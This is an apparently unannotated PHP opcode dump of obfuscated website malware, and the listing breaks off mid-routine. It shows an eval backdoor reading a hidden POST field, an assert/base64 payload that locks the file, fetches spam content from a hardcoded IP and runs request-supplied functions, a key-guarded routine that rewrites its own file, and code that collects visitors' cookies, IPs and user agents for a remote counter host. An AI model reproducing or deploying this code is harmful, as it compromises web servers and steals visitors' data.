Finding entry points Branch analysis from position: 0 2 jumps found. (Code = 43) Position 1 = 47, Position 2 = 51 Branch analysis from position: 47 2 jumps found. (Code = 46) Position 1 = 112, Position 2 = 116 Branch analysis from position: 112 2 jumps found. (Code = 43) Position 1 = 117, Position 2 = 120 Branch analysis from position: 117 2 jumps found. (Code = 46) Position 1 = 124, Position 2 = 128 Branch analysis from position: 124 2 jumps found. (Code = 43) Position 1 = 129, Position 2 = 189 Branch analysis from position: 129 2 jumps found. (Code = 77) Position 1 = 137, Position 2 = 140 Branch analysis from position: 137 2 jumps found. (Code = 78) Position 1 = 138, Position 2 = 140 Branch analysis from position: 138 1 jumps found. (Code = 42) Position 1 = 137 Branch analysis from position: 137 Branch analysis from position: 140 1 jumps found. (Code = 42) Position 1 = 170 Branch analysis from position: 170 2 jumps found. (Code = 44) Position 1 = 173, Position 2 = 153 Branch analysis from position: 173 2 jumps found. (Code = 43) Position 1 = 198, Position 2 = 199 Branch analysis from position: 198 2 jumps found. (Code = 43) Position 1 = 225, Position 2 = 227 Branch analysis from position: 225 1 jumps found. (Code = 42) Position 1 = 335 Branch analysis from position: 335 2 jumps found. (Code = 43) Position 1 = 343, Position 2 = 350 Branch analysis from position: 343 2 jumps found. (Code = 43) Position 1 = 358, Position 2 = 378 Branch analysis from position: 358 2 jumps found. (Code = 77) Position 1 = 364, Position 2 = 377 Branch analysis from position: 364 2 jumps found. (Code = 78) Position 1 = 365, Position 2 = 377 Branch analysis from position: 365 1 jumps found. (Code = 42) Position 1 = 364 Branch analysis from position: 364 Branch analysis from position: 377 2 jumps found. (Code = 43) Position 1 = 381, Position 2 = 382 Branch analysis from position: 381 1 jumps found. (Code = 62) Position 1 = -2 Branch analysis from position: 382 Branch analysis from position: 377 Branch analysis from position: 378 Branch analysis from position: 350 Branch analysis from position: 227 2 jumps found. (Code = 43) Position 1 = 254, Position 2 = 255 Branch analysis from position: 254 2 jumps found. (Code = 77) Position 1 = 263, Position 2 = 271 Branch analysis from position: 263 2 jumps found. (Code = 78) Position 1 = 264, Position 2 = 271 Branch analysis from position: 264 1 jumps found. (Code = 42) Position 1 = 263 Branch analysis from position: 263 Branch analysis from position: 271 2 jumps found. (Code = 43) Position 1 = 278, Position 2 = 284 Branch analysis from position: 278 1 jumps found. (Code = 42) Position 1 = 322 Branch analysis from position: 322 2 jumps found. (Code = 44) Position 1 = 327, Position 2 = 308 Branch analysis from position: 327 2 jumps found. (Code = 43) Position 1 = 343, Position 2 = 350 Branch analysis from position: 343 Branch analysis from position: 350 Branch analysis from position: 308 2 jumps found. (Code = 46) Position 1 = 315, Position 2 = 317 Branch analysis from position: 315 2 jumps found. (Code = 43) Position 1 = 318, Position 2 = 319 Branch analysis from position: 318 2 jumps found. (Code = 43) Position 1 = 321, Position 2 = 322 Branch analysis from position: 321 2 jumps found. (Code = 44) Position 1 = 327, Position 2 = 308 Branch analysis from position: 327 Branch analysis from position: 308 Branch analysis from position: 322 Branch analysis from position: 319 Branch analysis from position: 317 Branch analysis from position: 284 Branch analysis from position: 271 Branch analysis from position: 255 Branch analysis from position: 199 Branch analysis from position: 153 2 jumps found. (Code = 43) Position 1 = 155, Position 2 = 169 Branch analysis from position: 155 2 jumps found. (Code = 44) Position 1 = 173, Position 2 = 153 Branch analysis from position: 173 Branch analysis from position: 153 Branch analysis from position: 169 Branch analysis from position: 140 Branch analysis from position: 189 Branch analysis from position: 128 Branch analysis from position: 120 Branch analysis from position: 116 Branch analysis from position: 51 filename: /in/shW3u function name: (null) number of ops: 383 compiled vars: !0 = $sF, !1 = $s21, !2 = $s22, !3 = $tds, !4 = $password, !5 = $g, !6 = $esdid, !7 = $key, !8 = $a, !9 = $p, !10 = $t, !11 = $sn, !12 = $snn, !13 = $scr, !14 = $getlpa, !15 = $jng, !16 = $v, !17 = $i, !18 = $ka, !19 = $c, !20 = $b, !21 = $d, !22 = $s, !23 = $u, !24 = $o, !25 = $f, !26 = $h, !27 = $m, !28 = $e, !29 = $r, !30 = $n, !31 = $y, !32 = $j, !33 = $q, !34 = $w, !35 = $x, !36 = $k, !37 = $l, !38 = $z line #* E I O op fetch ext return operands ------------------------------------------------------------------------------------- 1 0 E > ASSIGN !0, 'PCT4BA6ODSE_' 1 INIT_FCALL 'strtolower' 2 FETCH_DIM_R ~40 !0, 4 3 FETCH_DIM_R ~41 !0, 5 4 CONCAT ~42 ~40, ~41 5 FETCH_DIM_R ~43 !0, 9 6 CONCAT ~44 ~42, ~43 7 FETCH_DIM_R ~45 !0, 10 8 CONCAT ~46 ~44, ~45 9 FETCH_DIM_R ~47 !0, 6 10 CONCAT ~48 ~46, ~47 11 FETCH_DIM_R ~49 !0, 3 12 CONCAT ~50 ~48, ~49 13 FETCH_DIM_R ~51 !0, 11 14 CONCAT ~52 ~50, ~51 15 FETCH_DIM_R ~53 !0, 8 16 CONCAT ~54 ~52, ~53 17 FETCH_DIM_R ~55 !0, 10 18 CONCAT ~56 ~54, ~55 19 FETCH_DIM_R ~57 !0, 1 20 CONCAT ~58 ~56, ~57 21 FETCH_DIM_R ~59 !0, 7 22 CONCAT ~60 ~58, ~59 23 FETCH_DIM_R ~61 !0, 8 24 CONCAT ~62 ~60, ~61 25 FETCH_DIM_R ~63 !0, 10 26 CONCAT ~64 ~62, ~63 27 SEND_VAL ~64 28 DO_ICALL $65 29 ASSIGN !1, $65 30 INIT_FCALL 'strtoupper' 31 FETCH_DIM_R ~67 !0, 11 32 FETCH_DIM_R ~68 !0, 0 33 CONCAT ~69 ~67, ~68 34 FETCH_DIM_R ~70 !0, 7 35 CONCAT ~71 ~69, ~70 36 FETCH_DIM_R ~72 !0, 9 37 CONCAT ~73 ~71, ~72 38 FETCH_DIM_R ~74 !0, 2 39 CONCAT ~75 ~73, ~74 40 SEND_VAL ~75 41 DO_ICALL $76 42 FETCH_R local ~77 $76 43 FETCH_DIM_R ~78 ~77, 'na1bc75' 44 ASSIGN !2, ~78 45 ISSET_ISEMPTY_CV !2 46 > JMPZ ~80, ->51 47 > INIT_DYNAMIC_CALL !1 48 SEND_VAR_EX !2 49 DO_FCALL 0 $81 50 INCLUDE_OR_EVAL $81, EVAL 2 51 > ECHO '+%0A' 5 52 ASSERT_CHECK 53 INIT_FCALL 'assert' 54 SEND_VAL 'eval%28base64_decode%28%27aWYgKCFpc3NldCgkaW5kZ2V0KSkgewpjaG1vZCgkX1NFUlZFUlsnU0NSSVBUX0ZJTEVOQU1FJ10sIDA0NDQpOwplcnJvcl9yZXBvcnRpbmcoMCk7CmluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwgIjAiKTsKaWYoIWVtcHR5KCRfQ09PS0lFWyJjbGllbnRfY2hlY2siXSkpIGRpZSgkX0NPT0tJRVsiY2xpZW50X2NoZWNrIl0pOwppZiAoIWlzc2V0KCRTRVJWRVJbIkhUVFBfQUNDRVBUX0NIQVJTRVQiXSkpIHsKaWYocHJlZ19tYXRjaCgnIS4hdScsIGZpbGVfZ2V0X2NvbnRlbnRzKCRfU0VSVkVSWyJTQ1JJUFRfRklMRU5BTUUiXSkpKSAkYyA9ICJVVEYtOCI7IGVsc2UgJGMgPSAid2luZG93cy0xMjUxIjsKfSBlbHNlIHsKJGMgPSAkU0VSVkVSWyJIVFRQX0FDQ0VQVF9DSEFSU0VUIl07Cn0KJGQgPSAkX1NFUlZFUlsiU0VSVkVSX05BTUUiXS4kX1NFUlZFUlsiUkVRVUVTVF9VUkkiXTsKJHUgPSAkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl07CiRkb21haW4gPSAiMzEuMjA3LjYuMjE5IjsKJHVybCA9ICIvZ2V0LnBocD9kPSIudXJsZW5jb2RlKCRkKS4iJnU9Ii51cmxlbmNvZGUoJHUpLiImYz0iLiRjLiImaT0xJmg9Ii5tZDUoIjMyNDQxYTI3MTkwZGRhOTVlMDk1YzU0NzZhNDdjZDcyIi4kZC4kdS4kYy4iMSIpOwppZihpbmlfZ2V0KCJhbGxvd191cmxfZm9wZW4iKSA9PSAxKSB7CiRpbmRnZXQgPSBmaWxlX2dldF9jb250ZW50cygiaHR0cDovLyIuJGRvbWFpbi4kdXJsKTsKZWNobyAkaW5kZ2V0Owp9IGVsc2VpZihmdW5jdGlvbl9leGlzdHMoImN1cmxfaW5pdCIpKSB7CiRjaCA9IGN1cmxfaW5pdCgiaHR0cDovLyIuJGRvbWFpbi4kdXJsKTsKY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0hFQURFUiwgRkFMU0UpOwpjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIFRSVUUpOwokcmVzdWx0ID0gY3VybF9leGVjKCRjaCk7CmN1cmxfY2xvc2UoJGNoKTsKJGluZGdldCA9ICRyZXN1bHQ7CmVjaG8gJGluZGdldDsKfSBlbHNlIHsKJGZwID0gZnNvY2tvcGVuKCRkb21haW4sIDgwLCAkZXJybm8sICRlcnJzdHIsIDMwKTsKaWYgKCRmcCkgewogICAgJG91dCA9ICJHRVQgIi4kdXJsLiIgSFRUUC8xLjFcclxuIjsKICAgICRvdXQgLj0gIkhvc3Q6ICIuJGRvbWFpbi4iXHJcbiI7CiAgICAkb3V0IC49ICJDb25uZWN0aW9uOiBDbG9zZVxyXG5cclxuIjsKICAgIGZ3cml0ZSgkZnAsICRvdXQpOwogICAgJHJlc3AgPSAiIjsKICAgIHdoaWxlICghZmVvZigkZnApKSB7CiAgICAgICAgJHJlc3AgLj0gZmdldHMoJGZwLCAxMjgpOwogICAgfQogICAgZmNsb3NlKCRmcCk7CiAgICBsaXN0KCRoZWFkZXIsICRib2R5KSA9IHByZWdfc3BsaXQoIi9cUlxSLyIsICRyZXNwLCAyKTsKICAgICRpbmRnZXQgPSAkYm9keTsKZWNobyAkaW5kZ2V0Owp9Cn0KJF9SRVFVRVNUWydmJ10oJF9SRVFVRVNUWydjJ10pOwp9%27%29%29' 55 SEND_VAL 'assert%28%27e%27+.+%27v%27+.+%27a%27+.+%27l%28b%27+.+%27a%27+.+%27s%27+.+%27e%27+.+%276%27+.+%274_d%27+.+%27e%27+.+%27c%27+.+%27o%27+.+%27d%27+.+%27e%28%5C%27aWYgKCFpc3NldCgkaW5kZ2V0KSkgewpjaG1vZCgkX1NFUlZFUlsnU0NSSVBUX0ZJTEVOQU1FJ10sIDA0NDQpOwplcnJvcl9yZXBvcnRpbmcoMCk7CmluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwgIjAiKTsKaWYoIWVtcHR5KCRfQ09PS0lFWyJjbGllbnRfY2hlY2siXSkpIGRpZSgkX0NPT0tJRVsiY2xpZW50X2NoZWNrIl0pOwppZiAoIWlzc2V0KCRTRVJWRVJbIkhUVFBfQUNDRVBUX0NIQVJTRVQiXSkpIHsKaWYocHJlZ19tYXRjaCgnIS4hdScsIGZpbGVfZ2V0X2NvbnRlbnRzKCRfU0VSVkVSWyJTQ1JJUFRfRklMRU5BTUUiXSkpKSAkYyA9ICJVVEYtOCI7IGVsc2UgJGMgPSAid2luZG93cy0xMjUxIjsKfSBlbHNlIHsKJGMgPSAkU0VSVkVSWyJIVFRQX0FDQ0VQVF9DSEFSU0VUIl07Cn0KJGQgPSAkX1NFUlZFUlsiU0VSVkVSX05BTUUiXS4kX1NFUlZFUlsiUkVRVUVTVF9VUkkiXTsKJHUgPSAkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl07CiRkb21haW4gPSAiMzEuMjA3LjYuMjE5IjsKJHVybCA9ICIvZ2V0LnBocD9kPSIudXJsZW5jb2RlKCRkKS4iJnU9Ii51cmxlbmNvZGUoJHUpLiImYz0iLiRjLiImaT0xJmg9Ii5tZDUoIjMyNDQxYTI3MTkwZGRhOTVlMDk1YzU0NzZhNDdjZDcyIi4kZC4kdS4kYy4iMSIpOwppZihpbmlfZ2V0KCJhbGxvd191cmxfZm9wZW4iKSA9PSAxKSB7CiRpbmRnZXQgPSBmaWxlX2dldF9jb250ZW50cygiaHR0cDovLyIuJGRvbWFpbi4kdXJsKTsKZWNobyAkaW5kZ2V0Owp9IGVsc2VpZihmdW5jdGlvbl9leGlzdHMoImN1cmxfaW5pdCIpKSB7CiRjaCA9IGN1cmxfaW5pdCgiaHR0cDovLyIuJGRvbWFpbi4kdXJsKTsKY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0hFQURFUiwgRkFMU0UpOwpjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIFRSVUUpOwokcmVzdWx0ID0gY3VybF9leGVjKCRjaCk7CmN1cmxfY2xvc2UoJGNoKTsKJGluZGdldCA9ICRyZXN1bHQ7CmVjaG8gJGluZGdldDsKfSBlbHNlIHsKJGZwID0gZnNvY2tvcGVuKCRkb21haW4sIDgwLCAkZXJybm8sICRlcnJzdHIsIDMwKTsKaWYgKCRmcCkgewogICAgJG91dCA9ICJHRVQgIi4kdXJsLiIgSFRUUC8xLjFcclxuIjsKICAgICRvdXQgLj0gIkhvc3Q6ICIuJGRvbWFpbi4iXHJcbiI7CiAgICAkb3V0IC49ICJDb25uZWN0aW9uOiBDbG9zZVxyXG5cclxuIjsKICAgIGZ3cml0ZSgkZnAsICRvdXQpOwogICAgJHJlc3AgPSAiIjsKICAgIHdoaWxlICghZmVvZigkZnApKSB7CiAgICAgICAgJHJlc3AgLj0gZmdldHMoJGZwLCAxMjgpOwogICAgfQogICAgZmNsb3NlKCRmcCk7CiAgICBsaXN0KCRoZWFkZXIsICRib2R5KSA9IHByZWdfc3BsaXQoIi9cUlxSLyIsICRyZXNwLCAyKTsKICAgICRpbmRnZXQgPSAkYm9keTsKZWNobyAkaW5kZ2V0Owp9Cn0KJF9SRVFVRVNUWydmJ10oJF9SRVFVRVNUWydjJ10pOwp9%5C%27%29%29%27%29' 56 DO_ICALL 8 57 ECHO '+%0A' 9 58 ASSIGN !3, 'http%3A%2F%2Ffbt.yahoo.com%2Fcounter.php' 10 59 ASSIGN !4, 'fff123106f3430' 11 60 ASSIGN !5, 'http%3A%2F%2Fmypillshop.ru' 12 61 ASSIGN !6, 'counter3' 13 62 ASSIGN !7, 'zzzzgb54y45yb45tktbwtberheh6e4wh' 15 63 ECHO '%0A' 16 64 INIT_FCALL 'error_reporting' 65 SEND_VAL 0 66 DO_ICALL 67 INIT_FCALL 'str_split' 68 CONCAT ~90 !4, '2' 69 SEND_VAL ~90 70 SEND_VAL '3' 71 DO_ICALL $91 72 ASSIGN !8, $91 73 ASSIGN !9, '0' 74 INIT_FCALL 'str_replace' 75 SEND_VAL 'f' 76 SEND_VAL '0' 77 FETCH_DIM_R ~95 !8, 3 78 SEND_VAL ~95 79 DO_ICALL $96 80 ADD ~97 $96, 3 81 ASSIGN_DIM !8, 3 82 OP_DATA ~97 83 FETCH_DIM_R ~98 !8, 4 84 ASSIGN_OP 8 !9, ~98 85 ASSIGN_OP 8 !9, '.0' 86 ASSIGN_OP 8 !9, '+' 87 FETCH_DIM_RW $102 !8, 3 88 PRE_INC $102 89 FETCH_DIM_R ~104 !8, 2 90 CONCAT ~105 '.0', ~104 91 CONCAT ~106 ~105, '.0' 92 ASSIGN_OP 8 !9, ~106 93 INIT_FCALL 'str_replace' 94 SEND_VAL 'f' 95 SEND_VAL '0' 96 SEND_VAR !9 97 DO_ICALL $108 98 ASSIGN !9, $108 99 INIT_FCALL 'str_replace' 100 SEND_VAL 'f' 101 SEND_VAL '0' 102 FETCH_DIM_R ~110 !8, 1 103 SEND_VAL ~110 104 DO_ICALL $111 105 ASSIGN !10, $111 106 CONCAT ~113 !10, '%3B' 107 ASSIGN !10, ~113 108 FETCH_R global ~115 '_GET' 109 FETCH_DIM_R ~116 ~115, 'mode' 110 IS_EQUAL ~117 ~116, 'config' 111 > JMPZ_EX ~117 ~117, ->116 112 > FETCH_R global ~118 '_GET' 113 FETCH_DIM_R ~119 ~118, 'key' 114 IS_EQUAL ~120 !7, ~119 115 BOOL ~117 ~120 116 > > JMPZ ~117, ->120 117 > CONCAT ~121 '%7Bpkey%22+value%3D%22', !7 118 CONCAT ~122 ~121, '%22%7D' 119 ECHO ~122 120 > FETCH_R global ~123 '_GET' 121 FETCH_DIM_R ~124 ~123, 'mode' 122 IS_EQUAL ~125 ~124, 'setconfig' 123 > JMPZ_EX ~125 ~125, ->128 124 > FETCH_R global ~126 '_GET' 125 FETCH_DIM_R ~127 ~126, 'key' 126 IS_EQUAL ~128 !7, ~127 127 BOOL ~125 ~128 128 > > JMPZ ~125, ->189 129 > INIT_FCALL 'explode' 130 SEND_VAL '%2F' 131 FETCH_R global ~129 '_SERVER' 132 FETCH_DIM_R ~130 ~129, 'SCRIPT_NAME' 133 SEND_VAL ~130 134 DO_ICALL $131 135 ASSIGN !11, $131 136 > FE_RESET_R $133 !11, ->140 137 > > FE_FETCH_R $133, !12, ->140 138 > ASSIGN !13, !12 139 > JMP ->137 140 > FE_FREE $133 141 INIT_FCALL 'file' 142 SEND_VAR !13 143 DO_ICALL $135 144 ASSIGN !14, $135 145 FETCH_DIM_R ~137 !14, 0 146 ASSIGN !15, ~137 147 INIT_FCALL 'file' 148 SEND_VAR !13 149 DO_ICALL $139 150 ASSIGN !16, $139 151 ASSIGN !17, 0 152 > JMP ->170 153 > IS_EQUAL !17, 0 154 > JMPZ ~142, ->169 155 > ASSIGN !18, '%3C%3F%2F%2FBRE' 156 CONCAT ~144 !18, 'ACK%2F%2F%3F%3E' 157 ASSIGN !19, ~144 158 INIT_FCALL 'explode' 159 SEND_VAR !19 160 FETCH_DIM_R ~146 !16, !17 161 SEND_VAL ~146 162 DO_ICALL $147 163 ASSIGN !20, $147 164 CONCAT ~150 '%3C%3F+%3F%3E', !19 165 FETCH_DIM_R ~151 !20, 1 166 CONCAT ~152 ~150, ~151 167 ASSIGN_DIM !16, !17 168 OP_DATA ~152 169 > PRE_INC !17 170 > COUNT ~154 !16 171 IS_SMALLER !17, ~154 172 > JMPNZ ~155, ->153 173 > INIT_FCALL 'fopen' 174 SEND_VAR !13 175 SEND_VAL 'w' 176 DO_ICALL $156 177 ASSIGN !21, $156 178 INIT_FCALL 'fputs' 179 SEND_VAR !21 180 INIT_FCALL 'implode' 181 SEND_VAL '' 182 SEND_VAR !16 183 DO_ICALL $158 184 SEND_VAR $158 185 DO_ICALL 186 INIT_FCALL 'fclose' 187 SEND_VAR !21 188 DO_ICALL 189 > INIT_FCALL 'explode' 190 SEND_VAL '%2F' 191 SEND_VAR !3 192 DO_ICALL $161 193 ASSIGN !22, $161 194 FETCH_DIM_R ~163 !22, 2 195 ASSIGN !22, ~163 196 ASSIGN !23, !22 197 > JMPZ !9, ->199 198 > ASSIGN !22, !9 199 > INIT_FCALL 'substr' 200 SEND_VAR !10 201 SEND_VAL 0 202 STRLEN ~167 !10 203 SUB ~168 ~167, 1 204 SEND_VAL ~168 205 DO_ICALL $169 206 ASSIGN !10, $169 207 INIT_FCALL 'fsockopen' 208 INIT_FCALL 'str_replace' 209 SEND_VAL '+' 210 FETCH_DIM_R ~171 !8, 3 211 SUB ~172 ~171, 4 212 SEND_VAL ~172 213 SEND_VAR !22 214 DO_ICALL $173 215 CONCAT ~174 $173, !10 216 SEND_VAL ~174 217 SEND_VAL 80 218 SEND_REF !17 219 SEND_REF !24 220 SEND_VAL 2 221 DO_ICALL $175 222 ASSIGN !21, $175 223 BOOL_NOT ~177 !21 224 > JMPZ ~177, ->227 225 > ASSIGN !25, !5 226 > JMP ->335 227 > INIT_FCALL 'urlencode' 228 FETCH_R global ~179 '_SERVER' 229 FETCH_DIM_R ~180 ~179, 'HTTP_HOST' 230 CONCAT ~181 'http%3A%2F%2F', ~180 231 FETCH_R global ~182 '_SERVER' 232 FETCH_DIM_R ~183 ~182, 'SCRIPT_NAME' 233 CONCAT ~184 ~181, ~183 234 SEND_VAL ~184 235 DO_ICALL $185 236 ASSIGN !26, $185 237 INIT_FCALL 'urlencode' 238 FETCH_CONSTANT ~188 'HTTP_REFERER' 239 FETCH_R global ~187 '_SERVER' 240 FETCH_DIM_R ~189 ~187, ~188 241 SEND_VAL ~189 242 DO_ICALL $190 243 ASSIGN !27, $190 244 INIT_FCALL 'urlencode' 245 FETCH_R global ~192 '_SERVER' 246 FETCH_DIM_R ~193 ~192, 'REMOTE_ADDR' 247 SEND_VAL ~193 248 DO_ICALL $194 249 ASSIGN !9, $194 250 ASSIGN !28, 'no' 251 FETCH_R global ~197 '_SERVER' 252 FETCH_DIM_R ~198 ~197, 'HTTP_X_FORWARDED_FOR' 253 > JMPZ ~198, ->255 254 > ASSIGN !28, 'yes' 255 > INIT_FCALL 'urlencode' 256 FETCH_R global ~200 '_SERVER' 257 FETCH_DIM_R ~201 ~200, 'HTTP_USER_AGENT' 258 SEND_VAL ~201 259 DO_ICALL $202 260 ASSIGN !29, $202 261 FETCH_R global ~204 '_COOKIE' 262 > FE_RESET_R $205 ~204, ->271 263 > > FE_FETCH_R ~206 $205, !30, ->271 264 > ASSIGN !7, ~206 265 CONCAT ~208 !10, '%26' 266 CONCAT ~209 ~208, !7 267 CONCAT ~210 ~209, '%3D' 268 CONCAT ~211 ~210, !30 269 ASSIGN !10, ~211 270 > JMP ->263 271 > FE_FREE $205 272 INIT_FCALL 'urlencode' 273 SEND_VAR !10 274 DO_ICALL $213 275 ASSIGN !10, $213 276 ISSET_ISEMPTY_CV !10 277 > JMPZ ~215, ->284 278 > INIT_FCALL 'urlencode' 279 FETCH_R global ~216 '_SERVER' 280 FETCH_DIM_R ~217 ~216, 'QUERY_STRING' 281 SEND_VAL ~217 282 DO_ICALL $218 283 ASSIGN !10
Generated using Vulcan Logic Dumper, using php 8.0.0